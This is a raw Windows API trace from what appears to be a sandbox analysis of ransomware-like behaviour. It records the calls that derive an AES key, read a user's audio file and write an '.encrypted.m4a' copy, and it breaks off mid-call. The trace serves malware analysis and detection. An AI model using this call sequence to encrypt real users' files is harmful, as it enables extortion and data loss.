ftLastAccessTime.dwHighDateTime=0x1d5c4a1, ftLastWriteTime.dwLowDateTime=0x7e10b2e0, ftLastWriteTime.dwHighDateTime=0x1d5c4a1, nFileSizeHigh=0x0, nFileSizeLow=0x42e1, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="yRQDF_aSfhekn.m4a", cAlternateFileName="YRQDF_~1.M4A")) returned 0x7c2100 [0031.684] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0031.684] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.684] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.684] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0031.684] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0031.684] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.684] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.684] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0031.685] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0031.685] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.685] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0031.685] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.685] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.685] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.685] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.685] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.685] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.685] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0031.685] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0031.685] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.685] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.685] CryptHashData (hHash=0x7c2240, pbData=0x7c7758, dwDataLen=0x100, dwFlags=0x1) returned 1 [0031.685] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.685] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.686] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.686] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0031.686] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.686] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.686] CryptDestroyHash (hHash=0x7c2240) returned 1 [0031.686] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\yrqdf_asfhekn.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.686] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.686] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0031.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0031.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0031.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0031.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0031.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0031.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0031.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0031.686] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0031.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0031.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0031.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0031.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0031.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0031.686] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0031.687] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0031.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0031.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0031.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0031.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0031.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0031.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0031.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0031.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0031.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0031.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0031.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0031.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0031.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0031.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0031.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0031.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791190 [0031.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0031.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0031.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0031.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791190 | out: hHeap=0x770000) returned 1 [0031.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0031.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0031.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0031.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0031.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0031.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0031.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0031.688] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k")) returned 0x10 [0031.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0031.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0031.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0031.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0031.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0031.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0031.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0031.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0031.688] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.encrypted.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\yrqdf_asfhekn.encrypted.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0031.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0031.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0031.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0031.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0031.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0031.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0031.689] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0031.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0031.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0031.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0031.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0031.689] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0031.689] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0031.689] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0031.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0031.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0031.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0031.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0031.690] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0031.690] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x42e1, lpOverlapped=0x0) returned 1 [0031.691] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0031.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0031.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0031.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x42e1) returned 0x955018 [0031.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0031.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0031.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0031.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0031.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0031.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x42e1) returned 0x959308 [0031.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0031.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.692] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0031.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x42e1) returned 0x955018 [0031.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0031.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0031.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0031.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.692] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0031.693] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0031.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.693] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0031.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0031.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0031.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0031.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0031.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x42e1) returned 0x955018 [0031.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0031.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0031.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0031.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0031.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0031.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0031.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0031.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da348 [0031.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0031.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0031.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0031.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889778 [0031.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0031.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0031.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0031.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0031.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x42e1) returned 0x95d5f8 [0031.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0031.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0031.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0031.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0031.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0031.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0031.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0031.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0031.694] RtlAllocateHeap 